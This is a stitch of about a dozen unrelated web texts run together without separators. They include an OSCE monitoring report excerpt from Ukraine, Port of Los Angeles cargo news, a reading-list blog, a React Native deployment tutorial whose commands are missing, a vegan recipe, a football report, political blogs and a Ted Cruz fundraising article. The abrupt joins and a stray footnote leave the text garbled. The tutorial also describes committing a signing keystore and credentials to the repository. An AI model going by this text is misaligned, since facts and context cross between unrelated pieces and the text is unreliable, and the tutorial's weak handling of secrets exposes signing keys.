In Mariupol (115 kilometres south of Donetsk), the SMM observed several groups of traffic police and security personnel of “METINVEST” on joint patrols. The SMM was informed that joint patrolling in the city commenced on May 11. ‘METINVEST' informed SMM that a workforce of 300 workers will help to remove the barricades from the city centre. The SMM observed that the City Administration Building was being cleaned, the barricades removed, with only a few tyres remaining at the street corners around the City Administration building.
The situation in Dnipropetrovsk remained calm. The Chief of Police in Pavlohrad (75 kilometres west of Dnipropetrovsk) informed the SMM that manpower at the roadblocks has been increased; a new contingent of Ukrainian National Guards has been deployed to assist police officers with the manning of the roadblocks. He stated that the co-operation with “Self Defence” had been strengthened. The SMM visited a roadblock located in the eastern outskirts of Pavlohrad but did not observe any changes in terms of manpower.
In Kherson the general situation remained calm. The SMM spoke to the authority in charge of the northern Crimean Canal in Kherson region, near Kalanchak (85 kilometres southeast of Kherson). According to him communications breakdown between local and central authorities had affected the co-ordination of the integrated water management system. Reportedly, this resulted in reduced water flows to the Crimean peninsula with consequences on irrigation and drinking water supplies.
In Odesa the situation was assessed as calm. The SMM attended the first dialogue-planning meeting where experts from the Odesa national university of international relations, ethnic relations and history, and a representative of the student body were present. The group was convened by the “Odesa Mediation Group” which has been appointed by the Vice Governor of Odessa region to foster dialogue. The group agreed to engage in dialogue with groups who oppose the unitary Ukrainian state. There was consensus on the need and possibility to initiate dialogue among moderate groups. The need to establish the truth about the tragic events in the Trade Union Building on 2 May was identified as a priority and key to reconciliation and developing trust within society.
The situation in Chernivtsi was calm. In Hlyboka district, the SMM met with the district police chief. He explained that the police closely co-operate with “Self-Defense”, a registered non-governmental organisation consisting of 120 members. The members of the organization wear black uniforms and are unarmed. The police check their criminal records and provide training before conducting joint patrols.
In Lviv the situation was calm.
The situation in Ivano-Frankivsk was calm. The SMM met, in Kosiv (100 kilometres south of Ivano-Frankivsk), the head of the local “Self-Defence” organization. He informed the SMM that the “Self-Defence” tent from the local Maidan had been removed at the beginning of March and that there were approximately 100-200 active members of the local “Self- Defence” group.
In Kyiv the situation remained calm. On 14 May, upon invitation of the Ukrainian Government, the SMM Chief Monitor attended the launch of the Ukrainian-led and Ukrainian-owned broad-based National Dialogue. The plan envisioned that this dialogue will encompass a series of round tables, across the country.
The SMM learnt, from an activist group on Maidan, about attempts by various political and oligarchical groups to exert influence over these groups on the Maidan. The activists reported aggressive behaviour towards them by some of the “Self-Defence” members and a fear that ”Self-Defence” that currently "protect" them are beholden to the decisions of the political groups that support them.
[i] According to various sources SMMU is aware of about the figure of around 20 detainees. The figure mentioned by Ponomaryov is however not confirmed.
Despite netting its third best year in port history in 2014, the Port of Los Angeles saw ongoing congestion affect its cargo numbers during the second half of last year.
The nation's busiest seaport moved 8.3 million container units in 2014, which was 6 percent more than 2013, according to statistics released Friday by the port. That made it the third busiest year at the Los Angeles port, behind 8.4 million units in 2007 and 8.5 million in 2006.
But that news was tempered by issues related to congestion, which has been brought by the arrival of larger ships carrying more cargo for various shipping lines, the lack of available chassis (the trailers that allow trucks to tow cargo containers) and unresolved contract talks between the longshore workers union and their employers that have grown contentious.
“(The issues related to congestion) are creating dynamics we've never seen before,” said port spokesman Arley Baker.
During the first half of the year, the Port of Los Angeles was No. 1 in productivity, according to the Journal of Commerce. That dropped off around the latter six months, around the time longshore contract negotiations began and bottlenecks along the supply chain began to increase.
Los Angeles' port moved 658,567 units in December, up only 1 percent from the same time last year.
“The 2014 numbers are an encouraging indication that the national economy continues to improve,” Port Executive Director Gene Seroka said in a statement. “Beyond that, the second half of the year ushered in a mix of unprecedented challenges due to transformational changes in the shipping line business.”
He also encouraged the International Longshore and Warehouse Union and Pacific Maritime Association to work quickly and in good faith toward a contract.
“We are working hard to help our customers and supply chain partners overcome those challenges and urge them to work together with us to find solutions,” Seroka said.
The Port of Long Beach expects to release its cargo numbers next week.
Contact Karen Robes Meeks at 562-714-2088.
In 2016, I embarked on a project where I tried to match my reading to the demographics of the U.S.* I set out to read 52 books broken down like this:
10 books (or ~17%) written by Latino writers
7 books (or ~13 %) written by writers from Africa or of African descent
3 books (or roughly 5%) written by writers from Asia or of Asian descent
1 book (or roughly 1%) written by a Native American writer
1 book (or roughly 1%) written by a writer from the pacific islands or of pacific island decent,
The rest of the books could (but certainly did not have to be) written by Caucasian writers.
Half of all books had to be written by women.
So, how'd I do? Pretty well, but not perfectly. I met the racial diversity goals, but, due to some faulty math along the way, I ended up reading slightly less than 50% female authors. I tried to hammer through and ended up reading a bit more than 52 books, but alas, the clock ran out at around 43% female writers.
Oh well, good effort, kid.
When I started this project, I knew it was problematic, but I thought it was worth giving it a try. Here's what I learned:
The Good
For someone like me, who, when left to his own devices, will overwhelming read white men, setting up these rules forced me out of my comfort zone. I read books I'd never have known about before, seeking out Native American and Pacific Islander writers who would have forever been off my radar.
In seeking out these voices, I learned things I'd never have known otherwise, and that, to me, is one of the reasons for reading in the first place.
The Bad
I knew going into this that the project could tokenistic and limiting, and that really started to come through in the last quarter of the year when I was trying to figure out my reading plan to meet the goal. For example, I wanted to read Brief History of Seven Killings, by Marlon James, a Jamaican writer, but reading another male writer was going to hurt my stats, so I decided to wait until this year.
How does that make sense?
It doesn't.
For me, reading is about exploring and learning, and I enjoy being improvisational in my choices. Of course, if I'd read less white dudes in the beginning of the year, reading James wouldn't have been a problem. But I'd back myself into a corner with my stupid rules and they felt, well, silly and counterproductive.
Even if I had read less white men, many other voices didn't make it into my reading. I made no concerted effort to read LGBT writers, for example, or writers with disabilities. I also painted with an absurdly large brush. I conflated the vastly different experiences of a Chilean poet and a Dominican novelist under the umbrella “Latino” which is pretty much the definition of reductionist.
I knew going in that the limitations would create an imperfect tool, and they did. Still, I think it was worth the effort. I discovered quite a bit in terms of both new writers and the limits of this type of quota system.
What's next?
I'm glad I did this project, but I won't be doing it again. In 2017, I'm going to continue to prioritize diversity in my reading choice, but I'm moving away from this sort of quota system. I'm going to make an effort to read more women, and more people of color, and I'll pay attention to the way things are shaking out, but I'm taking a break from rigid rules. We'll see how it goes.
The Actual Books
Ok, enough ruminating. Onto what I actually read – 55 books, split pretty evenly between fiction and non-fiction. The books this year were a better than average group — there weren't many stinkers in the lot.
Indeed, it's hard to pick favorite, but I'll try:
Best Nonfiction Book – Malcolm X: A Life of Reinvention, Manny Marable. A tough one. I loved One of Us and Just Mercy and in another year could have picked either of those. But Marable's book is on another level. The scholarship, the reflection, the magnitude of the project, all of it combined to make an incredibly compelling read. This is not only the best book I read this year, but one of the best biographies I have ever read.
Best Fiction Book. Winter in the Blood. Equally hard to choose a favorite here. I could have chosen from among the many, many wonderful books I read this year including Family Life, Too Like the Lightning, Distant Star, the Fifth Season and People in the Trees, but I'm choosing Winter in the Blood, because it resonated with me so long after I closed it. It is beautifully written, and profoundly depressing, but buried among all the despair, there's a hint of hope. I need to hope right now, so it gets the nod.
Below is a complete list of the books with my annotation of whether I recommend it for the general reader, recommend it for the enthusiast interested in the subject matter, or if I think you shouldn't bother at all.
Remember, I have no taste.
1. H is for Hawk, Helen McDonald – Recommended
2. One of Us: the Story of Anders Brevik and the Massacre in Norway, Asen Seierstad – Recommended
3. A Life Without Limits, Chrissie Wellington – Recommended for the Enthusiast
4. Black Flags: The rise of Isis, Joby Warrick – Recommended
5. Digital Gold: Bitcoin and the Story of the Misfits and Millionaires Trying to Re-invest Money, Nathaniel Popper – Recommended
6. Mythology, Edith Hamilton – Recommended
7. The Greek Way, Edith Hamilton – Not Recommended
8. Stesichorus: Complete Works (Loeb edition), Stesichorus – Not Recommended
9. Autobiography of Red, Anne Carson – Recommended
10. Family Life, Akhil Sharma – Recommended
11. Brief and Wondrous Life of Oscar Wao, Junot Diaz – Recommended
12. Living With A Seal: 31 Days with the Toughest Man on the Planet, Jesse Itzler – Recommended
13. Red Doc >, Anne Carson – Recommended for the enthusiast
14. Parable of the Sower, Octavia Butler– Recommended
15. The Trojan War: A Very Short Introduction, Eric Cline – Recommended for the Enthusiast
16. Shadow Divers: The True Story of Two Americans Who Risked Everything to Solve One Of the Last Mysteries of WWII, Robert Kurson – Recommended for the enthusiast
17. A Beautiful Mind, Sylvia Nasar – Recommended for the Enthusiast.
18. The Iliad, Homer (trans. Fagles) – Recommended
19. 10% Happier: How I Tamed the Voice in My Head, Reduced Stress Without Losing My Edge and Found Self-Help That Actually Works, Dan Harris – Recommended for the Enthusiast
20. The Odyssey, Homer (trans. Fagles) – Recommended
21. The Aeneid, Virgil (trans. Fagels) – Recommended for the Enthusiast
22. Find A Way, Diane Nyad – Recommended
23. Just Mercy: A Story of Justice and Redemption, Bryan Stevenson – Recommended
24. Pandemic: Tracking Contagions from Cholera to Ebola and Beyond, Sonia Shah – Recommended
25. A Cold Day in Paradise, Steve Hamilton – Recommended for the Enthusiast
26. The Trojan Women, Hecuba, Andromache, Euripides (trans. Moorwood) – Recommended
27. The World of Odysseus, M.I. Finley – Recommended
28. The Beautiful Struggle, Ta-Nehisi Coates – Recommended
29. The Second Life of Nick Mason, Steve Hamilton – Recommended for the Enthusiast
30. Infomacracy, Malka Older – Recommended for the Enthusiast
31. Malcolm X: A Life of Reinvention, Manny Marable – Recommended
32. The Fire Next Time, James Baldwin – Recommended
33. Too Like the Lightning, Ada Palmer – Recommended
34. Racing Weight: How to Get Lean for Peak Performance, Matt Fitzgerald – Recommended for the Enthusiast
35. 80/20 Running: Run Stronger and Race Faster by Training Slower, Matt Fitzgerald – Recommended for the Enthusiast
36. The Spitboy Rule: Tales of a Xicana In A Female Punk Band, Michelle Cruz Gonzales – Recommended
37. Loquela, Carlos Labbe – Not Recommended
38. Winter In the Blood, James Walsh – Recommended
39. Straits of Mesinna, Samuel Delany – Recommended for the Enthusiast
40. History of Buddhism, Robert Lopez – Recommended for the Enthusiast
41. War and the Iliad, Simone Weil and Rachel Bespaloff – Recommended
42. Lost City Radio, Daniel Alarcon – Recommended for the Enthusiast
43. Inferno, Patricia Mello – Not Recommended
44. Run or Die, Killian Jornet – Recommended for the Enthusiast
45. Hillbilly Elegy: A Story of a Family and Culture in Crisis J.D. Vance – Recommended
46. Distant Star, Roberto Bolano – Recommended
47. Twenty Love Poems and a Song of Despair, Pablo Neruda – Recommended for the Enthusiast
48. Sudden Death, Alvaro Enrique – Recommended for the Enthusiast
49. The Vegetarian, Han Kang – Recommended
50. The Fifth Season, N.K. Jemisin – Recommended
51. Shiner, Maggie Nelson – Recommended for the Enthusiast
52. Bluets, Maggie Nelson – Recommended for the Enthusiast
53. Pond, Claire Louise Bennett _ Recommended for the Enthusiast
54. The People in the Trees, Hanya Yanagihara – Recommended
55. By Night in Chile, Roberto Bolano – Recommended
*You can see my orginal post on what I planned to read in 2016 here.
Introduction
Delivering mobile application's updates is not as simple as in the case of a web application. From all currently available tools, we have found a working solution which is easy to integrate into a React Native Application.
And you definitely need to have an automated delivery. Today it's one of the basic business requirements.
For a new React Native project it is crucial to build a clear working process which will involve a business owner.
Usually a business owner is in a different time zone or has a limited amount of time to spend on a project. Therefore, you need to establish a reliable asynchronous communication mechanism. There should be an agreed way of regular verbal or written communication.
Still, that's only a part of a good workflow. Business owner's involvement in development process is vital. They should have a way to see current status of the project and app. In this way they can give relevant and timely feedback to your developers' team and manage the project in general. This is an easy and convenient way for a business owner to enjoy a full control over a project and achieve the desired result.
What you need to do is to deliver the latest version of the app and update it each time after making changes. The best way is to automate this task and that's where Continuous Deployment comes in.
It solves the following problems and even more:
A business owner can quickly check our progress and see the latest updates right away.
We can easily test our application on real devices with different OS, screen sizes, etc.
We can get instant feedback from our test group on any bugs or just UI/UX enhancements.
Developers don't have to waste time on this tedious routine.
With this in mind, our team formulated these basic requirements for Continuous Deployment:
Every time we push changes to our master branch on Github we want the CI process to build the code, run any tests, and then build and publish release-mode apps to be distributed to the internal team of testers.
We want a notification to be sent out to all testers when a new build is available.
In this article we are going to provide simple and detailed step-by-step instruction on how to setup Continuous Delivery for your React Native Android application by using Fabric and CircleCI 2.0.
This article only covers the Android part. Right now CircleCI 2.0 has no Continuous Delivery for iOS.
Instruction Plan
Here is quick overview of the instruction:
Add Configuration to Allow Releases to be Run on Real Devices. In this section we will show you how to generate secret signing files and constants, add them to the project and release signed application. Setup Application Distribution to Test Devices. This section shows you how to create command-line task that builds release application and uses distribution service to deliver it to devices. Automize Build and Distributions of Application. The last section shows you how to distribute new release version of the application automatically when the new commit is pushed to the master branch of your Github project.
Add Configuration to Allow Releases to be Run on Real Devices
Sign Application
Android requires that all applications should be digitally signed with a certificate before they can be installed (at least release version), so to distribute your Android applications to mobile devices, you'll need to generate signed release file.
The process of signing a React Native Android application is rather simple and straightforward. Follow an official instruction Generating Signed APK.
In the end you should have:
android/app/my-release-key.keystore — keystore file inside the project.
~/.gradle/gradle.properties — file with constants that are associated with your keystore.
Modified android/app/build.gradle to use release constants.
To check that your release is actually signed run this command:
It generates, signs and saves release file to android/app/build/outputs/apk/app-release.apk. If signing process is not successful then you get app-release-unsigned.apk.
Setup Application Distribution
Deliver Application
There are many distribution services. We have chosen Fabric Kit. It is one of the most popular, allows distribution both to iOS and Android and has many other features in its Kit. To integrate Fabric to your application you need to complete next two steps.
The first one is registration of our account and registration of application.
The second one is configuration of scripts in you project that are run on CIrcleCI and trigger distribution.
Integrate with Distribution Service from Fabric Kit
First, you need to register on Fabric. Then you need to install Fabric IDE plugin and follow its wizard to integrate Fabric with your application. During this integration you need to choose Crashlytics Kit. Once that is done, you should have access to Dashboard of your application on Fabric site.
To run distribution you'll need secret keys. You can find you key and secret by visiting your organization's settings page and clicking on the respective links under the organization's name.
Install Fastlane as Fabric Kit CLI
Fastlane is an automation tool that you call as console command to build and deploy from your machine. It is connected with Fabric Kit but it is installed separately.
Fastlane is a ruby gem so it is installed accordingly. Use Gemfile to add it to the project.
Then you need to set it up to your project. Open /android folder and run
It will generate fastlane folder and config files. You need to update Fastfile file:
android/fastlane/Fastfile
Let's analyze it step by step:
Gradle command builds release:
However, we have custom-build in two steps to resolve memory error on CircleCI.
Crashlytics command deploys the release. You need to provide token and secret from Fabric that we showed earlier. Group is a set of tester accounts that are going to get this release. Tester's emails are added on fabric site in beta configurations.
To test that distribution to your mobile is setup correctly you need to run your lane:
And in a few minutes you should have an email with download link to a new version in every tester's email box. This email has instruction on how to install app on your mobile.
Automize Build and Distributions of Application
Automatic Delivery
Here comes the main part — how to make CircleCI 2.0 do deploys for you.
Add docker image
First of all, we need to setup our environment in a similar way we have locally and install quite a few programs and instruments. CircleCI 2.0 runs our commands in docker. So we need to write Dokcerfile with all dependencies, build and image from it and provide this image to CircleCI.
Here is our Dockerfile. It's a good practice to put your Dockerfile next to config file in your application:
.circleci/images/android-react-native/Dockerfile
Let's take a look at the list of our main dependencies that this Dockerfile contains:
gradle, android sdk — to build release apk.
nodejs, yarn — to install all packages.
react-native — to be used in beta lane to build assets.
ruby, bundler — to run fastlane.
To this end, we could take ready android image from circleci like this one circleci/android:api-25-alpha. And build our Dockerfile on this basis. You can see what's inside here. Basically, there is gradle and android sdk. But we are even more lazy. So we borrowed container from this nice guy. It has gradle, android sdk, nodejs, yarn. Not bad at all, huh? And then we build our Dockerfile on top of that and add few remaining dependencies.
To make it usable by CircleCI you need to build an image and push it to your docker repository. Here is an instruction to build and distribute your image. Alternatively, you can use our image.
Add Circle CI 2.0 config to run distribution commands
Add this configuration file to your project:
.circleci/config.yml
Let's analyze this file:
We use our image from the Dockerhub:
Install npm packages
Run tests and linter
Do deploy if we are in master.
Now, before making a deployment we need to configure few more things. First of all, we need to provide keystore and its constants to sign our release apk. We saved gradle file with constants in our project in `config/gradle.properties`. So we copy it to ~/.gradle/gradle.properties. But if you are obsessed with security then you can store them in CircleCI environment variables and write a file from scratch instead.
Also you need to provide android/app/therentfiles-release-key.keystore file that you generated before. We just committed it to our project. So it's not mentioned in CircleCI config file. But you can do it in a more secure way: put it in some secure place and download it from CI each time.
Next step is kinda optional. We add our app url and name. We can't use our environment variables from CircleCI directly. It works only from .env file for react native project. These variables allow us to customize deploy. I.e. you can deploy to staging or to production. Or have one application name in beta testing and another in production.
Then we run bundle to install fastlane.
And then (at last) we run fastlane script that deploys beta release
Don't forget that this script uses fabric keys from environment variables so you need to add env vars to circle ci. Here is the list of environment variables:
To test it out you need to add CircleCI to your repository on Github. And then you need to push a commit to the master branch. CircleCI should run build based on config script and deploy your app.
And that's all! Piece of cake!
Conclusion
Hopefully, we were able to give you an exhaustive tutorial. It should provide you with an understanding of basic requirements for delivery process and instruments to resolve them.
Of course, automatic delivery is a very typical task and it would be nice to have more established and simplified solution. One of such solutions for the web is Heroku Review where most of the configuration is done for you and yet it is a very flexible and functional tool. Please, let us know if you know something similar for mobile development!
This instruction has quite a lot of steps. I decided not to elaborate it here but rather give links to other articles or official tutorials with installation and configuration instructions. You will find full instructions for every part and up-to-date documentation from official sources there. Moreover, our article does not mean to overwhelm you and therefore covers the essentials only. However, if you feel like something is missing or is not clear feel free to ask questions in the comments section below.
In the next article we will cover the same thing but for iOS.
Stay tuned!
List of recommended articles:
A substance so easy to get, as baking soda, might be the answer to cleaning the air of CO2 emissions.
A team of researchers has found a way to eliminate the carbon dioxide from the atmosphere with the help of baking soda. Scientists developed some microcapsules made of a polymer shell that is highly permeable and a fluid consisting of sodium carbonate solution to take out the carbon dioxide from coal and natural gas eliminated by power plants.
This process has been the first demonstration of this type, to capture CO2 in a controlled way and its release could be possibly used for industrial purposes like in the production of steel and cement.
Engineers from the Lawrence Livermore National Laboratory, worked in collaboration with the scientists from the University of Illinois and Harvard to create a media capture of carbon which contained core-shell microcapsules.
According to statements of the laboratory, the capture of carbon was aimed to prevent the discharge of big quantities of carbon dioxide, a greenhouse gas that captures heat and heats up the planet, into the atmosphere coming from fossil fuel used in power generators and for other industrial uses.
Even though the presently used methods turned out to be successful, they could be harmful for the environment. The main desire of the research team was to find a solution that allowed them to move away from using caustic fluids, like mono ethanol amine, to catch carbon dioxide and use less harmful substances, such as carbonates. The use of baking soda as an active chemical was an essential development, explained researcher Roger Aines from Lawrence Livermore. He added that corrosiveness worked at improved levels as the chemical compound was more benign and was always incapsulated.
Placing the carbonate substance inside the capsules would allow to be used for catching carbon dioxide without directly touching the surface of equipment from the power plant. Also, they would be able to transport it easily between absorption and release towers, even if it had absorbed so much carbon dioxide that it turned solid.
The research for the encapsulating operation was funded by the U.S. government by the department of Advanced Research Projects Agency-Energy. Roger Aines, declared that baking soda would never loose its properties in the same way that the present technology, amine was. Baking soda, could be reused forever, while amines corrupt on the occurs of months to years, added Aines.
Image Source: World Tech Today
My vegan Mexican Molletes are simple but incredibly delicious. Refried beans are slathered on crusty bread like a bolillo or a French baguette, and topped with sweet and spicy mango salsa.
One of my favorite places in Mexico is the charming town of Morelia where we once spent a few days doing almost nothing. Nothing, except taking lazy strolls on streets dotted with devout Mexicans and students.
Morelia is packed with beautiful churches and colleges, and if you're not inclined to one or attending the other, the only thing you can pretty much do is walk around and eat. Luckily, Morelia has some surprisingly trendy restaurants and many of these are vegan friendly. There even was an all-vegetarian restaurant in the city which was an unexpected but welcome treat. You could sit outdoors at a table with a great view of the main street and watch the world go by, or you could listen to one of the many street entertainers who tended to stop by ever so often with a song.
Every morning, Desi and I would make our way to one of those restaurants, situated right across the street from the town's centerpiece: a huge pink-stone cathedral with majestic twin towers. I was hooked to one breakfast dish that, although not vegan, was easily veganized for me by the friendly staff: Molletes.
Molletes are Mexican sandwiches — usually open faced– made of crusty bread, like a bolillo, smeared with refried beans and topped with cheese and pico de gallo salsa. The first time I had it, I asked the waitress to hold the queso and the sandwich was so good that I never thought I'd eat anything else again.
The reason why Molletes are so tasty despite being so simple is because of all those textures and flavors coming together in a perfect marriage. You have the crusty bolillo with its pillowy crumb, the velvety refried beans with just that right bite of spice, and the salsa with its fresh, vibrant flavors.
I had been wanting to share with you my own version of Mexican Molletes, which I make rather traditionally except that I used a mango-basil salsa this time instead of tomato salsa. It was divine.
I have a recipe for the perfect Bolillos on the blog, but because I wanted this to be a perfectly healthy snack, I repurposed by Sourdough Baguette into wholegrain bolillos for my Moletes. Try it out: you will not be disappointed. Or just buy some baguettes — or any crusty bread– from the bakery.
Enjoy!
Defensive vomiting refers to the use of emesis to defend against ingested pathogens or, in animals, against predators.
In humans [ edit ]
Vomiting serves an evolutionary purpose for humans by preventing the ingestion of something harmful, and by expelling noxious substances once ingested.[1]
Vomiting excessive amounts of alcohol is an attempt by the body to prevent alcohol poisoning and death. Vomiting may also be caused by other drugs, such as opiates, or toxins found in some foods and plants. Food allergies and sensitivities, such as lactose intolerance, can cause vomiting.[2]
Morning sickness may have a defensive purpose. One professor has posited that morning sickness discourages pregnant women from eating meat and strong-tasting vegetables, which may contain toxins and microorganisms. If ingested, the fetus might be harmed in the first 18 weeks of pregnancy.[3]
In animals [ edit ]
Turkey vultures will vomit to dispel any disturbing animal. They can propel their vomit up to 10 feet.[4]
The European roller, a much smaller bird found in parts of Africa, Europe, Asia, and the Middle East, uses vomit in a different way. A baby European roller will vomit a foul-smelling orange liquid onto itself to turn away a predator. The smell also warns the parents to return to the nest.[5]
See also [ edit ]
Area postrema, the part of the brain that controls vomiting
Chemoreceptor trigger zone, the part of the area postrema that relays signals through the blood-brain barrier
Your Voice, Your Choice: Parks & Streets is a participatory budgeting initiative in which Seattle residents democratically decide how to spend a portion of the City's budget on small-scale park and street improvements. A total of $2 million has been allocated in the 2019 budget and residents can participate in the district where they live, work, go to school, receive services, or volunteer.
Your Voice, Your Choice is important because it is a simple way for people to get involved, connect with neighbors, and make a positive impact in their community. - Kim S., YVYC volunteer
There are four key steps to this participatory budgeting process:
Idea Collection
Community members brainstorm and submit potential project ideas to be funded throughout the city. Project ideas will be collected between January 28 - February 22, 2019. (learn more)
Project Development
Teams of community members work together to evaluate and prioritize ideas, narrowing the list to 8-10 project ideas per Council District. Project Development will take place from March 18 – April 12, 2019. (learn more)
Voting
Community members vote on their top projects within their individual Council District. The Steering Committee will advise on how much funding each Council District will receive. Voting will take place from July 1 – July 31, 2019. (learn more)
Fund & Implement
After each City Council District selects the top vote-getting projects, City Departments will include winning projects in the following year's budget. (learn more)
Want to learn more about the Voice, Your Choice program? Watch the video below!
Lucas Leiva has told Liverpool fans there is more to come from Lazar Markovic, who dismantled Sunderland on Saturday, and Philippe Coutinho, who has thrilled Kopites with his displays in recent weeks.
Markovic gave perhaps his finest performance since arriving at the club from Benfica in the summer as he landed the decisive blow during the 1-0 Barclays Premier League win over the Black Cats at the Stadium of Light.
The Serbian tormented his opopnents with a series of slaloming surges and hit the only goal of the game before rattling Costel Pantilimon's crossbar with a stunning, dipping volley from the edge of the penalty area.
Lucas was thrilled with the vibrant showing from his teammate, who now has two Liverpool goals to his name, and the Brazilian is backing Markovic to go from strength to strength in the second half of the season.
"There's no doubt he's a very young player and people usually judge players after one or two months," Lucas told Liverpoolfc.com.
"We know that the Premier League is a hard league to come and play in straight away, so he's just improving all the time and today he showed again that he could be very important for the future of the club."
Watch the video here »
Coutinho, meanwhile, who scooped the Standard Chartered Player of the Month accolade this week, was his usual diligent self, prowling in search of openings and supplying passes with deft touches throughout the 90 minutes.
The Brazilian has already spent two years showcasing his talents at Anfield, having arrived at the club from Inter Milan in January 2013, but Lucas insists the No.10 can still improve further and attain even higher standards.
"I think Coutinho can get anywhere he wants," said the defensive midfielder. "His quality and his movement and his final pass. Philippe has been here for two years now and you can see he will only get better.
"They are young players. When you have difficult moments during the season, normally the young players struggle a bit more. But they have the quality and I think they will be very important."
While Lucas was keen to praise the work of others, the 28-year-old also played his part against Sunderland, shielding the Reds' back four, reading the flow of the game to make interceptions and stifle the opposition.
In the 13 games since Lucas returned to the team against Ludogorets Razgrad in late November, Liverpool have lost just one match - and that was against Manchester United at Old Trafford, when the No.21 was not involved.
He has started in every other match during that time and has not been on the losing side - a statistic that Lucas is determined to preserve throughout the remainder of the current campaign.
"It's good to win away from home and keep a clean sheet at a difficult place to come to," he said of the win over Sunderland. "But we had a plan to win the game and we probably could have scored more goals.
"I think we had the patience to move the ball very well. We knew that Sunderland play very compact and that they are always very hard to break down. But I think we were very dangerous on the counter-attack and we were pressing the ball very well. So I think we deserved it."
He added: "I thought for the first 10 minutes of the second half that we were probably too deep again. They had a chance, which hit the crossbar, but apart from that, I think we controlled the game and it was a well-deserved win."
Practically every day, a new video is circulating on the internet showing severe examples of police misconduct. As the police become increasingly militarized and brazen in their violent attacks—for example, see this story on a Baptism party in a private backyard broken up for excessive noise, ended when cops tasered a grandfather and a pregnant mother (who has been perversely charged with “assaulting a police officer”)—cameras may be our best hope in preventing the emergence of a full-blown police state. The police killing of Oscar Grant at the Oakland BART station on New Years Day was made famous and prosecutable because it was caught on so many cellphone cameras. Even government cameras give a glimpse into police corruption and criminality, such as with this recent footage of multiple officers agreeing to frame a woman to cover up a car accident caused by one of their own.
I used to think that police brutality was becoming much more commonplace, but maybe it's only more visible now because of technology? I would guess it's a combination of both factors at play.
Of course, government wants to monitor what we do, but keep everything it does secret. This is why Obama has gone so far as to push for an amendment to the Freedom of Information Act purely to prevent photos depicting torture of detainees, and has blocked the release of documents pertaining to the destruction of videos revealing torture in interrogation. But the technology is there, and the surveillance state isn't going away, so as long as cameras advance and proliferate, I say: Turn them against the state. It may be one of our best checks on government power.
Tags: Barack Obama, Civil Liberties, Freedom of Information Act, Police, Police State, Surveillance State, taser, The State, Torture
This link to the Spiegel's summary (full coverage here) was quite good, thanks to the emailer who sent that in. I've reviewed a bunch of the coverage from multiple sources (but seen none of the actual documents), and I guess my thoughts could be summarized as:
1.) We really are doing everything they accuse us of doing. For me, the biggest surprise is they would openly ask diplomats to spy.
2.) Apparently, near everyone in he world wants the United States to attack Iran. They also want to make sure that it is the United States who is blamed for attacking Iran, and want no credit/blame/perception of involvement.
3.) Iraq is still an absolute mess.
I generally sense that people, overall, will be more hostile towards wikileaks after this dump. The previous dumps seemed to corroborate competing stories. This dump will just be viewed by many as an attempt to hurt the United States. I have a hard time getting worked up about it- a government that views none of my personal correspondence as confidential really can't bitch when this sort of thing happens.
*** Update ***
One final irony. All this data was available because we changed policies in response to 9/11.
Wealthy investors shot skeet with Sen. Ted Cruz in Park City, Utah, earlier this month. Conservative lawyers gathered in a clubby Washington restaurant last week to raise money for his presidential bid. And on Monday, billionaire technology entrepreneur Darwin Deason and five other wealthy Texans announced that they were coming aboard his campaign.
For all his bashing of “billionaire Republican donors” who “actively despise our base,” the anti-establishment senator from Texas is being bolstered by his own robust base of wealthy contributors. Cruz raised $5.2 million through the end of September from supporters who gave him the $2,700 maximum — making him No. 2 in the GOP race for large donors, after former Florida governor Jeb Bush, according to an analysis by the nonpartisan Campaign Finance Institute.
Cruz's un­or­tho­dox campaign has hit on a fundraising formula that no other candidate has been able to match: raising millions from a robust base of grass-roots supporters while building a substantial network of rich backers.
The senator's quiet fundraising prowess — he has collected $26.5 million to date — could help give him staying power in what is sure to be a hard-fought battle for the GOP nomination. The structure of his donor base closely resembles that of President Obama, whose vaunted fundraising operation intensely focused on low-dollar givers as well as major bundlers, bringing in a record $783 million for his 2012 reelection.
The Texas Tribune thanks its sponsors. Become one.
Cruz has had trouble making inroads in New York financial circles or on Florida's donor-rich Gold Coast. But he is finding support among like-minded constitutionalists, religious conservatives, and oil and gas executives, campaign finance filings and fundraising invitations show.
“A lot of Wall streets is out of touch with mainstream America,” Cruz's wife, Heidi — who is on leave from her job as a managing director at Goldman Sachs and is one of his most prolific fundraisers — said recently. “That's not our funding base.”
The senator is a different person in private fundraisers than out on the campaign trail, according to people who have observed the dynamic. He doesn't back away from his hard-line positions, but he quickly moves past them, trying to present a restrained, Harvard-educated lawyer.
“People are swayed by his intellect,” said Mica Mosbacher, a Houston fundraiser helping organize events for Cruz across the country. “He always says, ‘Ask me all the hard questions.' And he is very polite and humble. I think the firebrand you see [in public] is his passion getting ahead of him. Those who are supporting him admire that he will stand up for what's right.”
A Republican strategist well connected to the donor world added: “When he's with major donors, they expect the guy they see with all the red meat, but they instead see an intelligent but toned-down lawyer with real bona fides. He will say things like, basically, ‘This is politics — you've got go out there and sell and perform.' ”
At a recent fundraiser in New York, Cruz made the case that he is the candidate to unite a fractious Republican Party, arguing that he can energize evangelicals, tea partyers, military hawks and fiscal conservatives.
The Texas Tribune thanks its sponsors. Become one.
“His feeling — and I agree with him — is that you cannot make one segment love you and another segment hate you,” said venture capitalist Ken Abramowitz, who hosted the gathering. “He stressed that he would appeal to all the segments but still maintain his message.”
Shmuley Boteach, a New Jersey rabbi and former congressional candidate, has been introducing Cruz to members of the Jewish community in New York and Los Angeles. Boteach said Cruz is diplomatic when it comes to hot-button issues — such as the time Boteach told the senator he has a gay brother and doesn't think he should speak so stridently against same-sex marriage.
“He'll respond very respectfully and say, ‘Okay, Shmuley, we respectfully disagree,' ” Boteach said. “I do not find him dogmatic about it. . . . When you get to know the guy, he's measured. This is a Princeton, Harvard graduate.”
It's a different scene on the campaign trail, where Cruz's fiery jabs have helped him amass a large pool of enthusiastic small donors. By the end of September, he had raised the second-largest amount in low-dollar contributions among the GOP field: $9.9 million to retired neurosurgeon Ben Carson's $18.2 million.
Overall, Cruz has the most balanced mix of donors among all the Republican hopefuls. Of the $24.5 million he has raised for the primary race, 40 percent has come from contributors who have given him $200 or less, 25 percent from those who have given $201 to $999, 13 percent from those who have given $1,000 to $2,699, and 21 percent from those who have given the $2,700 maximum, according to the Campaign Finance Institute.
Obama, by comparison, raised 28 percent of his 2012 donations from people who gave $200 or less and 22 percent from max-out donors.
It remains to be seen whether Cruz, who is hovering around 8 percent in national polls, will gain enough momentum to scale donations up as dramatically as Obama did in his campaigns.
Cruz has long said that his successful 2012 Senate run (and now his presidential bid) attempted to emulate Obama's 2008 election tactics. Cruz gave Senate campaign staffers a copy of “The Audacity to Win,” a book written by Obama's 2008 campaign manager, David Plouffe.
